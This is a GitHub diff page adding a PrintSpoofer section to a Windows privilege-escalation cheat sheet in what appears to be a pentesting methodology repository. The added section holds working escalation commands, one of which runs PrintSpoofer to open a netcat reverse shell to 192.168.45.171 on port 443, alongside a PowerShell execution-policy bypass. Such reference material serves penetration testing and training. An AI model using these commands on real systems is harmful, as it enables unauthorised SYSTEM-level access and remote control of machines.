File tree Expand file tree Collapse file tree 1 file changed +16
-0
lines changed
Methodology and Resources Expand file tree Collapse file tree 1 file changed +16
-0
lines changed Original file line number Diff line number Diff line change 49
49
* [ Juicy Potato (Abusing the golden privileges)] ( #juicy-potato-abusing-the-golden-privileges )
50
50
* [ Rogue Potato (Fake OXID Resolver)] ( #rogue-potato-fake-oxid-resolver ) )
51
51
* [ EFSPotato (MS-EFSR EfsRpcOpenFileRaw)] ( #efspotato-ms-efsr-efsrpcopenfileraw ) )
52
+ * [ PrintSpoofer (Printer Bug)] ( #PrintSpoofer-Printer-Bug ) ))
52
53
* [ EoP - Privileged File Write] ( #eop---privileged-file-write )
53
54
* [ DiagHub] ( #diaghub )
54
55
* [ UsoDLLLoader] ( #usodllloader )
@@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
1264
1265
```
1265
1266
1266
1267
1268
+ ### PrintSpoofer (Printer Bug)
1269
+
1270
+ > this work if SeImpersonatePrivilege is enabled
1271
+
1272
+ * Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
1273
+
1274
+ ``` powershell
1275
+ # run nc -lnvp 443 then :
1276
+ .\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
1277
+ # without listener
1278
+ .\PrintSpoofer64.exe -i -c cmd
1279
+ # Via RPD
1280
+ .\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
1281
+ ```
1282
+
1267
1283
## EoP - Privileged File Write
1268
1284
1269
1285
### DiagHub
You can’t perform that action at this time.
0 commit comments